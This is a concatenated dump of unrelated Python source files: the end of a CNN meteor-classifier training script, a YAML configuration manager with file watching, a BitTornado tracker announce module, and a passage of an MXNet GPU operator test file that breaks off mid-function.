callback_89_89 = SaveModelCallback(0.890, 0.890)
history = model.fit(train_generator,
validation_data=validation_generator,
steps_per_epoch=steps_per_epoch,
epochs=EPOCHS, #Later train with more epochs if neccessary
validation_steps=validation_steps,
shuffle=True,
verbose=1,
callbacks=[callback_89_89])
#model.load_weights(join(results_dir_weights, 'model_2_09_acc_0.917_val_acc_0.882.h5'))
#dataDir = 'C:\work_dir\meteorData\extra_data_filtered_30'
#problematicFile = join('G:\GIEyA\TFG\meteor_classification\\results_2', 'problematicData_40_1.txt')
#getProblematicMeteors(model, dataDir, ImageResolution, problematicFile, margin=0.40)
################################# PRINT MODEL PERFORMANCE AND GET PERFORMANCE MEASURES #################################
# Get performance measures:
getPerformanceMeasures(model, validation_dir, ImageResolution, join(results_dir, 'performance_' + modelNumber + '.txt'), threshold=0.50)
# Plot Accuracy and Loss in both train and validation sets
plotAccuracyAndLoss(history)
#########################################################################################################################
if __name__ == '__main__':
p = multiprocessing.Process(target=trainCNN)
p.start()
p.join()
|
configuration_manager.py
|
"""Centralized configuration manager."""
import os
import logging
import threading
import yaml
from inotify_simple import INotify, flags
from ambianic.config_mgm.config_diff import Config
from ambianic.config_mgm import fileutils
log = logging.getLogger(__name__)
class ConfigurationManager:
"""Configuration manager handles configuration centrally and
notify via callbacks of changes
"""
def __init__(self, work_dir=None, config=None):
self.Config = Config
self.CONFIG_FILE = "config.yaml"
self.SECRETS_FILE = "secrets.yaml"
self.lock = threading.RLock()
self.__config = None
self.watch_thread = None
self.watch_event = threading.Event()
self.handlers = []
if config is not None:
self.set(config)
if work_dir is not None:
self.load(work_dir)
def stop(self):
"""Stop the config manager"""
self.handlers = []
with self.lock:
self.__config = None
self.watch_stop()
if self.watch_thread is not None:
self.watch_thread.join()
self.watch_thread = None
def register_handler(self, callback):
"""Register a callback to trigger when there is a configuration update"""
self.handlers.append(callback)
def unregister_handler(self, callback):
"""Remove a callback from the configuration updates handlers"""
self.handlers.remove(callback)
def __watcher(self):
"""Watch for file changes"""
inotify = INotify()
wd = inotify.add_watch(self.work_dir, flags.MODIFY)
while not self.watch_event.is_set():
for event in inotify.read(timeout=100, read_delay=100):
for filename in [self.CONFIG_FILE, self.SECRETS_FILE]:
if event.name == filename:
log.info("File change detected: %s", filename)
self.load(self.work_dir)
break
# stop watching
inotify.rm_watch(wd)
def watch_start(self):
"""Start watching fs for changes"""
if self.watch_thread is None:
self.watch_event.clear()
self.watch_thread = threading.Thread(target=self.__watcher)
self.watch_thread.start()
def watch_stop(self):
"""Stop watching fs for changes"""
self.watch_event.set()
def save(self):
"""Save configuration to file"""
if self.get() is None:
return
fileutils.save(self.get_config_file(), self.get())
def get_config_file(self) -> str:
"""Return the config file path"""
return os.path.join(self.work_dir, self.CONFIG_FILE)
def get_secrets_file(self) -> str:
"""Return the secrets file path"""
return os.path.join(self.work_dir, self.SECRETS_FILE)
def load(self, work_dir) -> Config:
"""Load configuration from file"""
assert os.path.exists(work_dir), \
'working directory invalid: {}'.format(work_dir)
self.work_dir = work_dir
self.watch_start()
secrets_file = self.get_secrets_file()
config_file = self.get_config_file()
try:
if os.path.isfile(secrets_file):
with open(secrets_file) as sf:
secrets_config = sf.read()
else:
secrets_config = ""
log.warning('Secrets file not found. '
'Proceeding without it: %s',
secrets_file)
with open(config_file) as cf:
base_config = cf.read()
all_config = secrets_config + "\n" + base_config
config = yaml.safe_load(all_config)
log.debug('loaded config from %r: %r',
self.CONFIG_FILE, config)
return self.set(config)
except FileNotFoundError:
log.warning('Configuration file not found: %s', config_file)
log.warning(
'Please provide a configuration file and restart.')
except Exception as e:
log.exception('Configuration Error!', exc_info=True)
return None
def get_sources(self) -> Config:
"""Return sources configuration"""
config = self.get()
if config is None:
return None
if config.get("sources", None) is None:
config.set("sources", {})
return config.get("sources", None)
def get_source(self, source: str) -> Config:
"""Return a source by name"""
sources = self.get_sources()
if sources is None:
return None
return sources.get(source, None)
def get_ai_models(self) -> Config:
"""Return ai_models configuration"""
config = self.get()
if config is None:
return None
if config.get("ai_models", None) is None:
config.set("ai_models", {})
return config.get("ai_models", None)
def get_ai_model(self, ai_model: str) -> Config:
"""Return an ai_model by name"""
ai_models = self.get_ai_models()
if ai_models is None:
return None
return ai_models.get(ai_model, None)
def get_pipelines(self) -> Config:
"""Return ai_models configuration"""
config = self.get()
return config.get("pipelines", None)
def get_pipeline(self, name) -> Config:
"""Return pipeline configuration"""
pipelines = self.get_pipelines()
return pipelines.get(name, None)
def get_data_dir(self) -> Config:
"""Return data_dir configuration"""
config = self.get()
return config.get("data_dir", None)
def get(self) -> Config:
"""Get stored configuration.
Parameters
----------
Returns
-------
dictionary
Returns a dictionary with current configurations.
"""
with self.lock:
return self.__config
def set(self, new_config: dict) -> Config:
"""Set configuration
:Parameters:
----------
new_config : dictionary
The new configurations to apply
:Returns:
-------
config: dictionary
Return the current configurations.
"""
with self.lock:
if self.__config is None:
self.__config = Config(new_config)
else:
self.__config.sync(new_config)
for handler in self.handlers:
handler(self.get())
return self.get()
|
Rerequester.py
|
# Written by Bram Cohen
# modified for multitracker operation by John Hoffman
# see LICENSE.txt for license information
from herd.BitTornado.zurllib import urlopen, quote
from urlparse import urlparse, urlunparse
from socket import gethostbyname
from btformats import check_peers
from herd.BitTornado.bencode import bdecode
from threading import Thread, Lock
from cStringIO import StringIO
from traceback import print_exc
from socket import error, gethostbyname
from random import shuffle
try:
from hashlib import sha1 as sha
except ImportError:
from sha import sha
from time import time
try:
from os import getpid
except ImportError:
def getpid():
return 1
try:
True
except:
True = 1
False = 0
mapbase64 = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz.-'
keys = {}
basekeydata = str(getpid()) + repr(time()) + 'tracker'
def add_key(tracker):
key = ''
for i in sha(basekeydata+tracker).digest()[-6:]:
key += mapbase64[ord(i) & 0x3F]
keys[tracker] = key
def get_key(tracker):
try:
return "&key="+keys[tracker]
except:
add_key(tracker)
return "&key="+keys[tracker]
class fakeflag:
def __init__(self, state=False):
self.state = state
def wait(self):
pass
def isSet(self):
return self.state
class Rerequester:
def __init__(self, trackerlist, interval, sched, howmany, minpeers,
connect, externalsched, amount_left, up, down,
port, ip, myid, infohash, timeout, errorfunc, excfunc,
maxpeers, doneflag, upratefunc, downratefunc,
unpauseflag = fakeflag(True),
seed_id = '', seededfunc = None, force_rapid_update = False ):
self.excfunc = excfunc
newtrackerlist = []
for tier in trackerlist:
if len(tier)>1:
shuffle(tier)
newtrackerlist += [tier]
self.trackerlist = newtrackerlist
self.lastsuccessful = ''
self.rejectedmessage = 'rejected by tracker - '
self.url = ('?info_hash=%s&peer_id=%s&port=%s' %
(quote(infohash), quote(myid), str(port)))
self.ip = ip
self.interval = interval
self.last = None
self.trackerid = None
self.announce_interval = 30 * 60
self.sched = sched
self.howmany = howmany
self.minpeers = minpeers
self.connect = connect
self.externalsched = externalsched
self.amount_left = amount_left
self.up = up
self.down = down
self.timeout = timeout
self.errorfunc = errorfunc
self.maxpeers = maxpeers
self.doneflag = doneflag
self.upratefunc = upratefunc
self.downratefunc = downratefunc
self.unpauseflag = unpauseflag
if seed_id:
self.url += '&seed_id='+quote(seed_id)
self.seededfunc = seededfunc
if seededfunc:
self.url += '&check_seeded=1'
self.force_rapid_update = force_rapid_update
self.last_failed = True
self.never_succeeded = True
self.errorcodes = {}
self.lock = SuccessLock()
self.special = None
self.stopped = False
def start(self):
self.sched(self.c, self.interval/2)
self.d(0)
def c(self):
if self.stopped:
return
if not self.unpauseflag.isSet() and (
self.howmany() < self.minpeers or self.force_rapid_update ):
self.announce(3, self._c)
else:
self._c()
def _c(self):
self.sched(self.c, self.interval)
def d(self, event = 3):
if self.stopped:
return
if not self.unpauseflag.isSet():
self._d()
return
self.announce(event, self._d)
def _d(self):
if self.never_succeeded:
self.sched(self.d, 60) # retry in 60 seconds
elif self.force_rapid_update:
return
else:
self.sched(self.d, self.announce_interval)
def hit(self, event = 3):
if not self.unpauseflag.isSet() and (
self.howmany() < self.minpeers or self.force_rapid_update ):
self.announce(event)
def announce(self, event = 3, callback = lambda: None, specialurl = None):
if specialurl is not None:
s = self.url+'&uploaded=0&downloaded=0&left=1' # don't add to statistics
if self.howmany() >= self.maxpeers:
s += '&numwant=0'
else:
s += '&no_peer_id=1&compact=1'
self.last_failed = True # force true, so will display an error
self.special = specialurl
self.rerequest(s, callback)
return
else:
s = ('%s&uploaded=%s&downloaded=%s&left=%s' %
(self.url, str(self.up()), str(self.down()),
str(self.amount_left())))
if self.last is not None:
s += '&last=' + quote(str(self.last))
if self.trackerid is not None:
s += '&trackerid=' + quote(str(self.trackerid))
if self.howmany() >= self.maxpeers:
s += '&numwant=0'
else:
s += '&no_peer_id=1&compact=1'
if event != 3:
s += '&event=' + ['started', 'completed', 'stopped'][event]
if event == 2:
self.stopped = True
self.rerequest(s, callback)
def snoop(self, peers, callback = lambda: None): # tracker call support
self.rerequest(self.url
+'&event=stopped&port=0&uploaded=0&downloaded=0&left=1&tracker=1&numwant='
+str(peers), callback)
def rerequest(self, s, callback):
if not self.lock.isfinished(): # still waiting for prior cycle to complete??
def retry(self = self, s = s, callback = callback):
self.rerequest(s, callback)
self.sched(retry,5) # retry in 5 seconds
return
self.lock.reset()
rq = Thread(target = self._rerequest, args = [s, callback])
rq.setDaemon(False)
rq.start()
def _rerequest(self, s, callback):
try:
def fail (self = self, callback = callback):
self._fail(callback)
if self.ip:
try:
s += '&ip=' + gethostbyname(self.ip)
except:
self.errorcodes['troublecode'] = 'unable to resolve: '+self.ip
self.externalsched(fail)
self.errorcodes = {}
if self.special is None:
for t in range(len(self.trackerlist)):
for tr in range(len(self.trackerlist[t])):
tracker = self.trackerlist[t][tr]
if self.rerequest_single(tracker, s, callback):
if not self.last_failed and tr != 0:
del self.trackerlist[t][tr]
self.trackerlist[t] = [tracker] + self.trackerlist[t]
return
else:
tracker = self.special
self.special = None
if self.rerequest_single(tracker, s, callback):
return
# no success from any tracker
self.externalsched(fail)
except:
self.exception(callback)
def _fail(self, callback):
if ( (self.upratefunc() < 100 and self.downratefunc() < 100)
or not self.amount_left() ):
for f in ['rejected', 'bad_data', 'troublecode']:
if self.errorcodes.has_key(f):
r = self.errorcodes[f]
break
else:
r = 'Problem connecting to tracker - unspecified error'
return
self.errorfunc(r)
self.last_failed = True
self.lock.give_up()
self.externalsched(callback)
def rerequest_single(self, t, s, callback):
l = self.lock.set()
rq = Thread(target = self._rerequest_single, args = [t, s+get_key(t), l, callback])
rq.setDaemon(False)
rq.start()
self.lock.wait()
if self.lock.success:
self.lastsuccessful = t
self.last_failed = False
self.never_succeeded = False
return True
if not self.last_failed and self.lastsuccessful == t:
# if the last tracker hit was successful, and you've just tried the tracker
# you'd contacted before, don't go any further, just fail silently.
self.last_failed = True
self.externalsched(callback)
self.lock.give_up()
return True
return False # returns true if it wants rerequest() to exit
def _rerequest_single(self, t, s, l, callback):
try:
closer = [None]
def timedout(self = self, l = l, closer = closer):
if self.lock.trip(l):
self.errorcodes['troublecode'] = 'Problem connecting to tracker - timeout exceeded'
self.lock.unwait(l)
try:
closer[0]()
except:
pass
self.externalsched(timedout, self.timeout)
err = None
try:
h = urlopen(t+s)
closer[0] = h.close
data = h.read()
except (IOError, error), e:
err = 'Problem connecting to tracker - ' + str(e)
except:
err = 'Problem connecting to tracker'
try:
h.close()
except:
pass
if err:
if self.lock.trip(l):
self.errorcodes['troublecode'] = err
self.lock.unwait(l)
return
if data == '':
if self.lock.trip(l):
self.errorcodes['troublecode'] = 'no data from tracker'
self.lock.unwait(l)
return
try:
r = bdecode(data, sloppy=1)
check_peers(r)
except ValueError, e:
if self.lock.trip(l):
self.errorcodes['bad_data'] = 'bad data from tracker - ' + str(e)
self.lock.unwait(l)
return
if r.has_key('failure reason'):
if self.lock.trip(l):
self.errorcodes['rejected'] = self.rejectedmessage + r['failure reason']
self.lock.unwait(l)
return
if self.lock.trip(l, True): # success!
self.lock.unwait(l)
else:
callback = lambda: None # attempt timed out, don't do a callback
# even if the attempt timed out, go ahead and process data
def add(self = self, r = r, callback = callback):
self.postrequest(r, callback)
self.externalsched(add)
except:
self.exception(callback)
def postrequest(self, r, callback):
if r.has_key('warning message'):
self.errorfunc('warning from tracker - ' + r['warning message'])
self.announce_interval = r.get('interval', self.announce_interval)
self.interval = r.get('min interval', self.interval)
self.trackerid = r.get('tracker id', self.trackerid)
self.last = r.get('last')
# ps = len(r['peers']) + self.howmany()
p = r['peers']
peers = []
if type(p) == type(''):
for x in xrange(0, len(p), 6):
ip = '.'.join([str(ord(i)) for i in p[x:x+4]])
port = (ord(p[x+4]) << 8) | ord(p[x+5])
peers.append(((ip, port), 0))
else:
for x in p:
peers.append(((x['ip'].strip(), x['port']), x.get('peer id',0)))
ps = len(peers) + self.howmany()
if ps < self.maxpeers:
if self.doneflag.isSet():
if r.get('num peers', 1000) - r.get('done peers', 0) > ps * 1.2:
self.last = None
else:
if r.get('num peers', 1000) > ps * 1.2:
self.last = None
if self.seededfunc and r.get('seeded'):
self.seededfunc()
elif peers:
shuffle(peers)
self.connect(peers)
callback()
def exception(self, callback):
data = StringIO()
print_exc(file = data)
def r(s = data.getvalue(), callback = callback):
if self.excfunc:
self.excfunc(s)
else:
print s
callback()
self.externalsched(r)
class SuccessLock:
def __init__(self):
self.lock = Lock()
self.pause = Lock()
self.code = 0L
self.success = False
self.finished = True
def reset(self):
self.success = False
self.finished = False
def set(self):
self.lock.acquire()
if not self.pause.locked():
self.pause.acquire()
self.first = True
self.code += 1L
self.lock.release()
return self.code
def trip(self, code, s = False):
self.lock.acquire()
try:
if code == self.code and not self.finished:
r = self.first
self.first = False
if s:
self.finished = True
self.success = True
return r
finally:
self.lock.release()
def give_up(self):
self.lock.acquire()
self.success = False
self.finished = True
self.lock.release()
def wait(self):
self.pause.acquire()
def unwait(self, code):
if code == self.code and self.pause.locked():
self.pause.release()
def isfinished(self):
self.lock.acquire()
x = self.finished
self.lock.release()
return x
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import mxnet as mx
import numpy as np
import unittest
from nose.tools import assert_raises
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal, assert_allclose
from mxnet.base import MXNetError
from mxnet import autograd
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied
from common import run_in_spawned_process
from test_operator import *
from test_numpy_ndarray import *
from test_numpy_op import *
from test_numpy_interoperability import *
from test_optimizer import *
from test_random import *
from test_exc_handling import *
#from test_rnn import *
from test_sparse_ndarray import *
from test_sparse_operator import *
from test_ndarray import *
from test_subgraph_op import *
from test_gluon_gpu import _test_bulking
from test_contrib_operator import test_multibox_target_op
from test_tvm_op import *
from test_extensions import *
from test_contrib_optimizer import test_adamw
set_default_context(mx.gpu(0))
del test_support_vector_machine_l1_svm # noqa
del test_support_vector_machine_l2_svm # noqa
del test_custom_op_fork #noqa
def check_countsketch(in_dim,out_dim,n):
data = mx.sym.Variable("data")
h = mx.sym.Variable("h")
s = mx.sym.Variable("s")
sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
locations = {"data": x, "h": h, "s": s}
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
@with_seed()
def test_countsketch():
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1, maxn)
check_countsketch(in_dim, out_dim, n)
def check_ifft(shape):
shape_old = shape
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1]*2)
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1],shape[2],shape[3]*2)
sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
if len(shape) == 2:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[1]):
init_complex.real[:,i] = init[0][:,2*i]
init_complex.imag[:,i] = init[0][:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[3]):
init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[1]):
temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[3]):
temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
@with_seed()
def test_ifft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_ifft(shape)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0], rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[3],rtol=1e-3, atol=1e-5)
@with_seed()
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
def _make_ndarrays(input_list, ctx=mx.gpu(0)):
return [mx.nd.array(arr, dtype=arr.dtype, ctx=ctx) for arr in input_list]
def check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2):
values_arr = [np.random.rand(*shape).astype(dtype) * 10. for shape in shapes]
mx_vals = _make_ndarrays(values_arr, ctx=ctx)
sum_sq = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
sum_sq2 = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
# checks that operator is deterministic
assert np.array_equal(sum_sq.asnumpy(), sum_sq2.asnumpy())
ref_sum_sq = mx.nd.array([(v.astype('float32') ** 2).sum() for v in values_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_sum_sq.asnumpy(), sum_sq.asnumpy(), atol=tol1, rtol=tol1)
@with_seed()
def test_multi_sum_sq():
min_nparam = 100
max_nparam = 120
min_dim = 50000
max_dim = 100000
max_ndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.gpu(0)]:
for dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(min_dim, max_dim + 1, size=max_ndim) for i in range(nparam)]
low_tol = ctx == mx.cpu(0) and ('float16'in [dtype])
tol1 = 1e-3 if low_tol else 1e-5
tol2 = 1e-6 if low_tol else 1e-7
check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2)
def check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2):
weights_arr = [np.random.rand(*shape).astype(w_dtype) * 10. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(g_dtype) for shape in shapes]
lrs = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 100.
wds = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 1000.
eta = (np.random.rand() + 0.1)
eps = (np.random.rand() + 0.1) / 10000.
mx_w = _make_ndarrays(weights_arr, ctx=ctx)
mx_g = _make_ndarrays(grads_arr, ctx=ctx)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=ctx)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=ctx)
w_sum_sq = mx.nd.multi_sum_sq(*mx_w, num_arrays=len(shapes))
g_sum_sq = mx.nd.multi_sum_sq(*mx_g, num_arrays=len(shapes))
ref_w_sum_sq = mx.nd.array([(w.astype('float32') ** 2).sum() for w in weights_arr],
dtype='float32', ctx=ctx)
ref_g_sum_sq = mx.nd.array([(g.astype('float32') ** 2).sum() for g in grads_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_w_sum_sq.asnumpy(), w_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
assert_almost_equal(ref_g_sum_sq.asnumpy(), g_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
rescale_grad = (np.random.rand() + 0.5) * 100.
mx_new_lrs = mx.nd.multi_lars(mx_lrs, w_sum_sq, g_sum_sq, mx_wds, eta=eta, eps=eps,
rescale_grad=rescale_grad)
ref_w_l2norm = mx.nd.sqrt(ref_w_sum_sq)
ref_g_l2norm = mx.nd.sqrt(ref_g_sum_sq * rescale_grad * rescale_grad)
ref_new_lrs = mx.nd.zeros(ref_w_l2norm.shape, dtype='float32', ctx=ctx)
for i in range(ref_w_l2norm.size):
_w = ref_w_l2norm[i]
_g = ref_g_l2norm[i]
if _w > 0.0 and _g > 0.0:
ref_new_lrs[i] = lrs[i] * eta * _w / (_g + wds[i] * _w + eps)
else:
ref_new_lrs[i] = lrs[i]
assert_almost_equal(ref_new_lrs.asnumpy(), mx_new_lrs.asnumpy(), atol=tol2, rtol=tol2)
@with_seed()
def test_fast_lars():
min_nparam = 50
max_nparam = 60
maxdim = 10000
maxndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.cpu(0), mx.gpu(0)]:
for w_dtype in dtypes:
for g_dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
lowTol = ctx == mx.cpu(0) and ('float16'in [w_dtype, g_dtype])
tol1 = 1e-3 if lowTol else 1e-5
tol2 = 1e-6 if lowTol else 1e-7
check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2)
def check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights):
def _flatten_list(nested_list):
return [item for sublist in nested_list for item in sublist]
weights_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
rescale_grad = (np.random.random() + 1.0)
mx_w = _make_ndarrays(weights_arr)
mx_g = _make_ndarrays(grads_arr)
mx_p_w = _make_ndarrays(weights_arr)
mx_p_g = _make_ndarrays(grads_arr)
lrs = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 100.)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=mx.gpu(0))
wds = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 1000.)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=mx.gpu(0))
if use_master_weights:
weights32_arr = [arr.astype('float32') for arr in weights_arr]
mx_w32 = _make_ndarrays(weights32_arr)
mx_p_w32 = _make_ndarrays(weights32_arr)
if momentum is None:
if use_master_weights:
mx.nd.multi_mp_sgd_update(
*_flatten_list(zip(mx_w, mx_g, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
mx.nd.preloaded_multi_mp_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
out = mx.nd.multi_sgd_update(
*_flatten_list(zip(mx_w, mx_g)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
if use_master_weights:
momentums_arr = [np.random.rand(*shape).astype("float32") for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
out = mx.nd.multi_mp_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_mp_sgd_mom_update(
